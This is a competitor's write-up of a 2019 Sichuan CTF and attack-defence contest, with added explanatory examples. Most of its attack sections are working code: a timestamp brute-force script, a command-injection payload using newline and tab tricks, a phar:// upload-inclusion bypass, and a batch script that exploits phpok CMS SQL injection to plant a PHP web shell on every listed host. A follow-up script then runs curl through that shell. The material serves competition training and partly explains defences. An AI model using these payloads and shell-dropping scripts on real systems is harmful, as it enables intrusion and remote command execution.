2019 Sichuan Province 四叶草 (Clover) Security Competition

Writing this down from my own scattered notes; I will schedule a proper replay of the details later. The result was not ideal, and there are still big problems on the defence side.

1. CTF: 30 challenges on day one, 6 of them web; 4 specific techniques, solved at the time:

Weak-password login + flag (there was also SQL injection, but at the time I could not dump any data with it)

Script brute force

Command execution

phar file inclusion + upload

2. AWD: jsp + php + python. jsp: a few shells were found by auditing the logs; php: could be attacked directly with a script; python: no approach yet.

I. CTF

2. Script brute force

Reading the PHP: the foreach over $_REQUEST does `$$key = $_REQUEST[$v]`, so every request parameter is registered as a PHP variable and the `pwd` parameter lands in `$pwd`. The flag is printed when `$pwd` equals `$_SESSION['pwd']`, which is reset to `time()` at the top of every request, so all you need to submit is the server's current Unix timestamp (the `password` field only has to be present).

Set the range to the timestamp at the moment the script actually runs. Because the loop walks timestamps one by one while the server clock keeps moving, it can miss; run it a few times (or widen the range) until a response contains "Flag".

<?php
session_start();
$_SESSION['pwd']=time();                 // reset on every request: the "password" is the current Unix timestamp
foreach(array_keys($_REQUEST) as $v){
        $key = $v;
        $$key = $_REQUEST[$v];           // variable overwrite: pwd=... in the request becomes $pwd
    }
if (isset ($_POST['password'])) {        // 'password' only has to exist
    if ($_SESSION['pwd'] == $pwd)        // loose comparison against the timestamp
        die('Flag:'.$flag);
    else{
        print '<p>猜测错误.</p>';          // "wrong guess"
        $_SESSION['pwd']=time().time();
    }
}

#coding=utf-8
"""
author:图先生
About: http://www.youknowi.xin/
time:2019/7/20 12:53
filename:CTF6.py
"""
import requests

url = "http://192.200.1.49/admin/checklogin.php"
#url="http://192.168.159.133:9096/csp/2.php"
#data={"password":"1","pwd":{}}
# No cookie jar is used, so every request starts a fresh session and the server
# re-runs $_SESSION['pwd'] = time(); the candidate only has to match the server's
# current Unix timestamp. Walk a range of timestamps that covers the moment the
# script is running (bump the bounds to the current epoch time before running).
for i in range(1563599000, 1563599915):
    temp_pwd = i
    data = {"password": "1", "pwd": temp_pwd}
    s = requests.post(url=url, data=data)
    if "Flag" in s.text:
        print(s.text)
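An added example (my own, not the author's script or the challenge code) that does the same job as the loop above without walking several hundred sequential timestamps: it reads the local clock and tries a small window of offsets around it, which is what actually matters once clock skew and request latency are accounted for. The server side is a local stand-in for checklogin.php with a constructed clock skew, so the block runs offline; the `post` callable, the `skew_seconds` value and the `requests_poster` field names are assumptions.

```python
import time


class FakeChecklogin:
    """Offline stand-in for checklogin.php (constructed, not the real target).

    Mirrors the PHP: $_SESSION['pwd'] = time() on every request, then a loose
    comparison against the submitted pwd. `skew_seconds` models a server clock
    that disagrees with ours.
    """

    def __init__(self, skew_seconds=0, clock=time.time, flag="flag{constructed}"):
        self.skew = skew_seconds
        self.clock = clock
        self.flag = flag
        self.requests = 0

    def post(self, pwd):
        self.requests += 1
        session_pwd = int(self.clock()) + self.skew   # time() as PHP would see it
        try:
            submitted = int(pwd)                       # PHP == on int vs numeric string compares numerically
        except (TypeError, ValueError):
            return "<p>猜测错误.</p>"
        if session_pwd == submitted:
            return "Flag:" + self.flag
        return "<p>猜测错误.</p>"


def candidate_pwds(now, window=5):
    """Yield now, now+1, now-1, now+2, now-2, ... out to +/-window, most likely first."""
    yield now
    for d in range(1, window + 1):
        yield now + d
        yield now - d


def guess_time_password(post, clock=time.time, window=5, attempts=3):
    """Submit timestamps around our own clock until a response carries 'Flag'.

    `post(pwd)` must return the response body as text. Returns (pwd, body)
    on success, None if every attempt inside the window missed.
    """
    for _ in range(attempts):
        now = int(clock())
        for pwd in candidate_pwds(now, window):
            body = post(pwd)
            if "Flag" in body:
                return pwd, body
    return None


def requests_poster(url):
    """Build a `post` callable for a live endpoint (assumed field names follow
    the script above: password=1&pwd=<timestamp>)."""
    import requests  # imported lazily so the offline demo needs nothing extra

    def post(pwd):
        return requests.post(url, data={"password": "1", "pwd": pwd}, timeout=5).text

    return post


if __name__ == "__main__":
    server = FakeChecklogin(skew_seconds=3)   # constructed: server runs 3 s ahead
    print(guess_time_password(server.post), "after", server.requests, "requests")
    # live target would be: guess_time_password(requests_poster("http://192.200.1.49/admin/checklogin.php"))
```

The window is tried nearest-first, so a server that is a few seconds off costs a handful of requests instead of a blind range; if the whole window misses, the skew is larger than `window` and you widen it rather than re-run blindly.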

3. Command execution

A typical challenge of this kind.

127.0.0.1%0ased%091,10%09flag (%0a is a newline, used as the command separator; %09 is a tab, standing in for the filtered space; sed is used because cat, tail, head, more, less and strings were all blacklisted). Note that GNU sed needs a command after the address, so `sed 1,10 flag` on its own fails with "missing command"; `sed%09-n%091,10p%09flag`, or simply `sed%09p%09flag`, prints the file.
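An added example (mine, not from the original writeup) that models the filter this challenge imposed and why the %0a/%09 payload gets through: the blacklist only looks for a space and the usual file readers, while sh treats a newline as a command separator and a tab as argument whitespace. The endpoint (a ping wrapper), the exact blacklist and the flag path are assumptions. It also shows the argv-based form with `ipaddress` validation, which needs no blacklist at all. Nothing is executed; the block only shows what the shell would see.

```python
import ipaddress
import shlex
from urllib.parse import quote

# Assumed server-side filter: no space, none of the usual file readers.
BANNED_WORDS = ("cat", "tail", "head", "more", "less", "strings")


def blacklist_allows(ip_param):
    """Return True if the (assumed) blacklist lets the parameter through."""
    if " " in ip_param:
        return False
    return not any(word in ip_param for word in BANNED_WORDS)


def vulnerable_command(ip_param):
    """What an endpoint like system("ping -c 1 " . $_GET['ip']) hands to sh (assumed)."""
    return "ping -c 1 " + ip_param


def build_payload(host, extra_argv):
    """host + newline + tab-joined command, e.g. '127.0.0.1\\nsed\\tp\\tflag'.

    The newline ends the ping command; tabs replace the banned space.
    """
    return host + "\n" + "\t".join(extra_argv)


def url_encode(payload):
    """Percent-encode for the query string: newline -> %0A, tab -> %09."""
    return quote(payload, safe="/,")


def shell_sees(ip_param):
    """Split the injected command the way sh does: one argv list per line."""
    return [shlex.split(line) for line in vulnerable_command(ip_param).split("\n")]


def safe_ping_argv(host):
    """Hardened form: accept only an IP literal and never go through a shell.

    ipaddress.ip_address raises ValueError for anything that is not a bare
    IPv4/IPv6 address, so no newline, tab or second command can get in; the
    returned argv is meant for subprocess.run(argv) with shell=False.
    """
    ip = ipaddress.ip_address(host)
    return ["ping", "-c", "1", str(ip)]


if __name__ == "__main__":
    raw = build_payload("127.0.0.1", ["sed", "p", "flag"])
    print(url_encode(raw))                       # 127.0.0.1%0Ased%09p%09flag
    print(blacklist_allows(raw), shell_sees(raw))
    try:
        safe_ping_argv(raw)
    except ValueError as e:
        print("hardened endpoint rejects it:", e)
```

The point of `shell_sees` is that the filter inspects one string while sh executes two commands from it; validating the parameter as an address and passing an argv list removes the shell from the picture, which is the fix, whereas extending the blacklist just invites the next reader (awk, sort, uniq, xxd, ...).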

4. phar inclusion + upload

The phar:// wrapper is used to include the uploaded file (the upload restricted the extension, and the include appends a .php suffix to whatever path is supplied).

<?php
$file = $_REQUEST['file'];
if ($file != '') {
    $inc = sprintf("%s.php", $file); // only php file can be included
    include($inc);                   // stream wrappers such as phar:// are still honoured
}
?>

Pack shell.php into 1.zip, change the suffix to .jpg or .txt to get past the upload check, then include it with ?file=phar://1.zip/shell: the appended suffix turns this into phar://1.zip/shell.php, i.e. the shell.php entry inside the archive (the wrapper does not care what extension the archive itself carries, so the renamed 1.jpg works the same way). The `#` separator belongs to the zip:// wrapper (zip://1.zip%23shell, with the `#` URL-encoded so the browser does not strip it), not to phar://.

II. AWD

1. jsp

jeecms SSRF and RCE

The SSRF was reproduced at the time; the RCE was not (the others presumably attacked directly with the RCE).

2. php

phpok cms

Reference: https://balis0ng.com/post/dai-ma-shen-ji/phpok-4.7cong-zhu-ru-dao-getshell

Upload shell.php

#coding=utf-8
"""
https://balis0ng.com/post/dai-ma-shen-ji/phpok-4.7cong-zhu-ru-dao-getshell
author:图先生
About: http://www.youknowi.xin/
time:2019/7/21 11:24
filename:cmd.py
"""
import re
import requests

# one target host (or host:port) per line
urls = []
with open("ip.txt") as f:
    for line in f:
        line = line.rstrip("\n")
        if line:
            urls.append(line)

for host in urls:
    try:
        baseurl = "http://" + host
        if baseurl[-1] == '/':
            baseurl = baseurl[:-1]
        phpses = ''
        cookies = {'PHPSESSION': phpses}
        url = baseurl + '/index.php?c=upload&f=save'
        # Step 1: the upload filename is injected into the INSERT that records the
        # upload. It closes the real row and appends a second row whose stored path
        # is where the shell should land: the hex literals decode to
        # res/201705/23/, 9969de3ef2a7d425.jpg and res/balisong.php.
        # Shell bodies used:
        # <?php @eval($_POST[balisong]);phpinfo();?>
        # <?php @system($_GET["cmd123"]); phpinfo();?>
        files = [
            ('upfile', (
                "1','r7ip15ijku7jeu1s1qqnvo9gj0','30',''),('1',0x7265732f3230313730352f32332f,0x393936396465336566326137643432352e6a7067,'',0x7265732f62616c69736f6e672e706870,'1495536080','2.jpg",
                '<?php @system($_GET["cmd123"]); phpinfo();?>', 'image/jpg')),
        ]
        # Step 2: "replace" the injected record with the real shell body; the
        # server writes it to the stored path, i.e. res/balisong.php.
        files1 = [
            ('upfile',
             ('1.jpg', '<?php @system($_GET["cmd123"]); phpinfo();?>', 'image/jpg')),
        ]
        r = requests.post(url, files=files, cookies=cookies, timeout=10)
        response = r.text
        id = re.search(r'"id":"(\d+)"', response, re.S).group(1)
        id = int(id) + 1   # the injected row is assumed to get the id after the one returned
        url = baseurl + '/index.php?c=upload&f=replace&oldid=%d' % (id)
        r = requests.post(url, files=files1, cookies=cookies, timeout=10)
        shell = baseurl + '/res/balisong.php'
        response = requests.get(shell, timeout=10)
        if response.status_code == 200:
            print(shell)
        else:
            print("oh!Maybe failed.Please check")
    except Exception as e:
        print("%s: %s" % (host, e))   # keep going with the next target
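An added example (mine, not the author's or balis0ng's code) that unpacks what the upload filename in cmd.py actually injects: it decodes the hex literals, rebuilds the same filename from a chosen target path, and, for the defending side the notes above say was weak, lists any PHP file sitting under an upload directory, which is the check that would have caught res/balisong.php. The column layout is read from the script's own payload; the session id, timestamp and folder name are its literals, kept as-is.

```python
import os
import re

# The filename cmd.py uploads, copied verbatim from the script above.
SCRIPT_PAYLOAD = ("1','r7ip15ijku7jeu1s1qqnvo9gj0','30',''),('1',"
                  "0x7265732f3230313730352f32332f,"
                  "0x393936396465336566326137643432352e6a7067,'',"
                  "0x7265732f62616c69736f6e672e706870,'1495536080','2.jpg")


def hex_literal(text):
    """MySQL 0x... literal: carries a string with no quote characters, so the
    upload code's quote escaping never touches it."""
    return "0x" + text.encode().hex()


def decode_hex_literals(payload):
    """Decode every 0x... literal in an injected value back to text."""
    return [bytes.fromhex(h).decode() for h in re.findall(r"0x([0-9a-fA-F]+)", payload)]


def injection_filename(target_path,
                       session_id="r7ip15ijku7jeu1s1qqnvo9gj0",
                       folder="res/201705/23/",
                       stored_name="9969de3ef2a7d425.jpg",
                       timestamp="1495536080",
                       display_name="2.jpg"):
    """Rebuild the upload filename: finish the real INSERT row, then append a
    second row whose stored path is target_path. The later
    ?c=upload&f=replace&oldid=<that row> overwrites that path with the shell."""
    return "1','%s','30',''),('1',%s,%s,'',%s,'%s','%s" % (
        session_id, hex_literal(folder), hex_literal(stored_name),
        hex_literal(target_path), timestamp, display_name)


def php_files_under(root, suffixes=(".php", ".phtml", ".php5", ".phar")):
    """Defender's check: any executable script below an upload directory is a
    dropped shell until proven otherwise. Returns paths relative to root."""
    found = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith(suffixes):
                found.append(os.path.relpath(os.path.join(dirpath, name), root))
    return sorted(found)


if __name__ == "__main__":
    print(decode_hex_literals(SCRIPT_PAYLOAD))
    # ['res/201705/23/', '9969de3ef2a7d425.jpg', 'res/balisong.php']
    print(injection_filename("res/balisong.php") == SCRIPT_PAYLOAD)   # True
    print(php_files_under("res") if os.path.isdir("res") else "no res/ directory here")
```

Running `php_files_under` against the web root's res/ every minute during the match (and removing or quarantining whatever it lists) would have caught this chain; the real fix is to stop the filename from reaching the SQL statement unescaped and to refuse to serve PHP from the upload directory at all.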

getflag.py

#coding=utf-8
"""
author:图先生
About: http://www.youknowi.xin/
time:2019/7/21 11:24
filename:getflag.py
"""
import requests

# one target host (or host:port) per line, the same list cmd.py used
urls = []
with open("ip.txt") as f:
    for line in f:
        line = line.rstrip("\n")
        if line:
            urls.append(line)
print(urls)

for host in urls:
    # shell dropped by cmd.py: <?php @system($_GET["cmd123"]); phpinfo();?>
    # (for the eval variant <?php @eval($_POST[balisong]);phpinfo();?> post
    #  data={"balisong": "curl http://192.200.0.70/remoteflag/"} instead)
    base_url = "http://" + host + "/res/balisong.php?cmd123=curl http://192.200.0.70/remoteflag/"
    print(base_url)
    try:
        s = requests.get(base_url, timeout=10)   # requests percent-encodes the space
        if s.status_code == 200:
            print(s.text)
    except Exception as e:
        print("%s: %s" % (host, e))

3. python

I had not audited anything Python-related before, so this was set aside; the challenge this time was the django_blog project from GitHub.

2019.7.21
